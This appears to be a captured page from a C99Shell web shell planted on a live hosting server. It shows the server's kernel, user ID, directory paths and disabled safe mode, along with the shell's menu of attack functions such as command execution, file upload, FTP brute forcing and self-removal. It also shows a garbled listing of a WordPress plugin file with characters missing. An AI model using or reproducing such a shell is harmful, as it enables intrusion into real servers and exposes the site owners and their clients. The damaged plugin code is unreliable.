!C99Shell v.2.1 [PHP 7 Update] [1.12.2019]!

Software: Apache. PHP/5.6.40-67+ubuntu20.04.1+deb.sury.org+1 

uname -a: Linux hosting1.erectacloud.it 5.4.0-182-generic #202-Ubuntu SMP Fri Apr 26 12:29:36 UTC
2024 x86_64
 

uid=5229(web473) gid=5117(client172) groups=5117(client172),5002(sshusers) 

Safe-mode: OFF (not secure)

/var/www/clients/client172/web473/web/OLD_WP/wp-content/plugins/polylang/admin/   drwxr-xr-x
Free 179.59 GB of 490.84 GB (36.59%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     view-translations-post.php (2.02 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php

/**
 * displays the translations fields for posts
 */

if ( ! defined'ABSPATH' ) ) {
    exit; 
// don't access directly
};
?>
<p><strong><?php esc_html_e'Translations''polylang' ); ?></strong></p>
<table><?php
    
foreach ( $this->model->get_languages_list() as $language ) {
        if ( 
$language->term_id == $lang->term_id ) {
            continue;
        }

        
$value $this->model->post->get_translation$post_ID$language );
        if ( ! 
$value || $value == $post_ID ) { // $value == $post_ID happens if the post has been ( auto )saved before changing the language
            
$value '';
        }

        if ( isset( 
$_GET['from_post'] ) ) {
            
$value $this->model->post->get( (int) $_GET['from_post'], $language );
        }

        
$link $add_link $this->links->new_post_translation_link$post_ID$language );

        if ( 
$value ) {
            
$selected get_post$value );
            
$link $this->links->edit_post_translation_link$value );
        } 
?>

        <tr>
            <th class = "pll-language-column"><?php echo $language->flag $language->flag esc_html$language->slug ); ?></th>
            <td class = "hidden"><?php echo $add_link;?></td>
            <td class = "pll-edit-column pll-column-icon"><?php echo $link;?></td><?php

            
/**
             * Fires before the translation colummn is outputed in the language metabox
             * The dynamic portion of the hook name, `$lang`, refers to the language code
             *
             * @since 2.1
             */
            
do_action'pll_before_post_translation_' $language->slug ); ?>
            <td class = "pll-translation-column"><?php
                printf
'
                    <label class="screen-reader-text" for="tr_lang_%1$s">%2$s</label>
                    <input type="hidden" name="post_tr_lang[%1$s]" id="htr_lang_%1$s" value="%3$s" />
                    <input type="text" class="tr_lang" id="tr_lang_%1$s" value="%4$s"%5$s />'
,
                    
esc_attr$language->slug ),
                    
/* translators: accessibility text */
                    
esc_html__'Translation''polylang' ),
                    empty( 
$value ) ? esc_attr$selected->ID ),
                    empty( 
$value ) ? '' esc_attr$selected->post_title ),
                    empty( 
$link ) ? ' disabled="disabled"' ''
                
); ?>
            </td>
        </tr><?php
    
}?>
</table>

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v.2.1 [PHP 7 Update] [1.12.2019] maintained by KaizenLouie and updated by cermmik | C99Shell Github (MySQL update) | Generation time: 0.0115 ]--